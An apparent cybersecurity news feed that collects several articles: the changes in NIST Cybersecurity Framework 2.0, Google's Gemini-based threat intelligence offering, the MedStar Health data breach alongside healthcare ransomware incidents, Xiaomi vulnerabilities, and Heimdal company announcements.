Released in February 2024, the NIST Cybersecurity Framework 2.0 is the latest revision to the framework.

Inclusion of 'Govern' Core Function

While the previous framework stated 'Identify, Protect, Detect, Respond, and Recover' as its core functions in implementation, the new framework includes 'Govern.' Govern seeks to addresses the establishment of cybersecurity strategy, cybersecurity supply chain risk management, roles, responsibilities, authorities, policy, and the oversight of cybersecurity strategy within the  organizational context.

More Extensive Sub-categories and References within Core Functions

CSF version 2.0 includes additional categories and subcategories of cybersecurity goals and standards within the listed core functions, as well as hundreds of other helpful references to assist readers. The new framework is much more extensive with its definitions and resources.

Expanded Scope

The new framework’s scope has expanded beyond just the protection of critical infrastructure, such as water facilities and power plants, to providing safety standards for all organizations regardless of sector or size. This expanded scope is reflected in the change of the CSF’s official title to “The Cybersecurity Framework,” from the earlier “Framework for Improving Critical Infrastructure Cybersecurity.” This reflects an earlier request from the US Congress for the framework to expand its guidance to aid small businesses.

Framework Tiers

The new tiers define how a company handles cybersecurity risks, allowing them to adopt the tier that best fulfills their objectives, decrease cyber risk to a desirable level while accounting for difficulties in implementation. The tiers offer progress starting from 1 ('Partial') to 4  (‘Adaptive’) with rising level of sophistication but additional efforts in implementation.

Framework Profiles

The CSF profiles aid companies in finding the right path that’s right for them to reduce cybersecurity risks. Each profile lays out an organization’s “current” and “target” positions and in meeting the criteria in transforming from one profile to the other.

Focus on Supply-Chain and  Third-Party Risk

The framework incorporates new supply chain guidelines as part of the core 'Govern' function, and expects that cybersecurity risks within software supply chains should be considered while an organization carries out its functions. Moreover, the NIST framework reminds organizations to plan and conduct due diligence to reduce risks prior to entering agreements with supplier or other third-party contractors. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Google has brought together its Gemini AI model with its Mandiant cybersecurity unit and VirusTotal threat Intelligence to enhance threat landscape accessibility and efficiency. The company also plans to use its Gemini 1.5 Pro large language model, released in February, to ease the understanding of threat reports for a broader audience. At the RSA Conference in San Francisco, Google unveiled their latest AI-based solution to add more value to threat intelligence. Tackling the long-standing challenges of fragmented threat landscapes and cumbersome data collection processes, Google Threat Intelligence integrates Mandiant's frontline expertise, real-time contributions from VirusTotal's global community and Google's visibility into extensive user and device footprint to deliver a comprehensive defense against evolving cyber threats. Bernardo Quintero, founder of VirusTotal called this initiative a “sharing knowledge, protecting together” mission, which it has embraced with Google and Mandiant.

“I want to assure our entire community, from security researchers and industry partners to individual users, that VirusTotal's core mission remains unchanged. We remain deeply dedicated to collective intelligence and collaboration, fostering a platform where everyone can come together to share knowledge, access valuable threat information, and contribute to the fight against cyber threats,” Quintero said.

“VirusTotal remains committed to a level playing field, ensuring all partners, including Google Threat Intelligence, have equal access to the crowdsourced data VirusTotal collects. We also want to assure you that the core features and functionalities of VirusTotal will remain free and accessible to everyone, as always,” he added, clearing the air around VirusTotal’s future. “The strength of VirusTotal lies in its network of contributors and the vast amount of data they provide. This data serves as a valuable resource for the entire security industry, empowering our partners and others to enhance their products and contribute to a more secure digital world. This collaborative approach, based on transparency and equal access, strengthens the industry as a whole, ultimately leading to better protection for everyone.”

Challenges Addressed and Google’s Gemini AI Integration

For years, organizations have grappled with two primary hurdles in threat intelligence: a lack of holistic visibility into the threat landscape and the arduous task of collecting and operationalizing intelligence data. Google's new offering aims to address these challenges head-on providing insights and operational efficiency to security teams worldwide. The integration of Gemini, Google's AI-powered agent, enhances the operationalization of threat intelligence, streamlining the analysis process and accelerating response times. Using the Gemini 1.5 Pro large language model, Google claims to significantly reduce the time required to analyze malware attacks. For instance, the model took only 34 seconds to dissect the WannaCry virus and identify a kill switch, demonstrating its efficacy in threat analysis. Another key feature of Gemini AI is its ability to summarize threat reports into natural language, aiding companies in assessing potential attacks' impact and prioritizing responses. Threat Intelligence also offers a comprehensive threat monitoring network, empowering users to gain insights into the cybersecurity landscape and prioritize their defense strategies. Mandiant's experts, acquired by Google in 2022, play a vital role in assessing security vulnerabilities in AI projects through the Secure AI Framework. They conduct rigorous testing to fortify AI models against potential threats like data poisoning, ensuring their resilience against malicious exploitation. While Google is pioneering the integration of AI into cybersecurity, other tech giants like Microsoft are also exploring similar avenues, underscoring the growing significance of AI in safeguarding digital assets against evolving threats. As cyber threats continue to evolve, proactive defense strategies are more critical than ever. With Google Threat Intelligence, organizations can leverage cutting-edge technology to detect, analyze, and mitigate threats effectively, ensuring the security and resilience of their digital infrastructure in an increasingly complex threat landscape.  Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Official Press Release Copenhagen, Denmark – May 8th, 2024 — Heimdal®, a global leader in cybersecurity solutions, is excited to announce the appointment of Jesper Frederiksen as its new Chief Executive Officer. Bringing a wealth of experience from the SaaS and cloud security sectors, Frederiksen is renowned for his expertise in scaling IT technology organizations and enhancing […]

The post Heimdal Welcomes Jesper Frederiksen as Its New Chief Executive Officer appeared first on Heimdal Security Blog.

MedStar Health, a prominent non-profit healthcare provider disclosed a data breach that impacts more than 183,000 patients from its hundreds of care locations which it operates in the Baltimore-Washington area in the U.S. The not-for-profit healthcare provider is worth $7.7 billion and is one of the largest employers in the region with more than 34,000 associates working across 300 care locations including 10 hospitals and 33 urgent care clinics, ambulatory care centers and primary and specialty care providers. They together treat hundreds of thousands of patients on a yearly basis. The impacted individuals' personal data may have been compromised when an outsider gained access to emails and files of three employees, MedStar Health said in a statement on the data breach. MedStar Health reported notifying 183,709 affected patients via letters and filed a notice with the Department of Health and Human Services. The unauthorized access occurred sporadically between January and October last year, with patient information found in breached files and emails. Although there's no indication of actual acquisition or viewing of patient data, the company couldn't rule out such access. Patient information including names, addresses, dates of birth, service dates, provider names and insurance details, were contained in the compromised emails and files, MedStar Health said. The healthcare provider urged affected patients to monitor healthcare statements for any unusual activities and assured implementation of new safeguards to prevent future breaches.

Earlier MedStar Health Data Breach

The digital woes of the healthcare provider are not new. In fact, this is the second time in a decade that MedStar Health is facing a massive data breach scare. In 2016, a virus, likely a ransomware malware infected the computer network of MedStar Health. This prompted a complete shutdown of services for the healthcare giant, which resulted in diversion of new patients to other hospitals and the care givers had to resort to pen and paper to continue regular operations. The impact was such that the FBI was called in to investigate the MedStar Health data breach, which followed similar cyberattacks on at least three other medical institutions in California and Kentucky.

Healthcare Breaches on the Rise

This incident adds to a growing list of healthcare breaches and ransomware attacks, including the Change Healthcare that caused widespread disruptions across U.S. Initially described as an “enterprise-wide connectivity issue,” the severity of the attack went a bar above when Blackcat – also known as Alphv – ransomware gang claimed responsibility for it. The Russia-based ransomware and extortion gang claimed to have stolen millions of Americans’ sensitive health and patient information, a tactic commonly employed by ransomware gangs to exert pressure on victims. However, on February 29, Blackcat withdrew its claim on the breached data of the healthcare group, raising questions if a ransom was paid. The company did confirm that is paid a $22 million ransom later but it now faces multiple lawsuits for alleged negligence in safeguarding clients' personal information. The parent company UnitedHealth has allocated over $2 billion to fight the fallout of the Change Healthcare data breach. The company last week also stated that a lack of multi-factor authentication (MFA) resulted into the massive hack. Blackcat in September 2023 claimed a similar data breach on McLaren Healthcare, where nearly 6 terabytes worth of data was siphoned. Owing to such large scale healthcare data breaches, the U.S. Cybersecurity and Infrastructure Security Agency in March unveiled a cybersecurity toolkit for healthcare sector that would help them implement advanced tools, that fortify their defenses against evolving threats. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Researchers warn that Xiaomi devices are vulnerable to over 20 critical issues affecting applications and system components. Security specialists notified the vendor regarding the flaws at the end of April 2023. For the moment, Xiaomi didn’t manage to fix all of them. What are the vulnerable Xiaomi apps? The Xiaomi vulnerabilities impact applications that common […]

The post 20+ Xiaomi Vulnerabilities Put Users’ Data and Devices at Risk appeared first on Heimdal Security Blog.

We’re excited to announce our latest venture, a strategic partnership with DACTA that promises to strengthen cybersecurity defenses across the Asia-Pacific (APAC) region. This collaboration is a testament to Heimdal’s dedication to pushing the boundaries of cybersecurity and extending our innovative solutions to new markets, with DACTA’s unparalleled regional expertise leading the charge. The synergy […]

The post Heimdal Teams Up with DACTA to Strengthen Cybersecurity in the APAC Region appeared first on Heimdal Security Blog.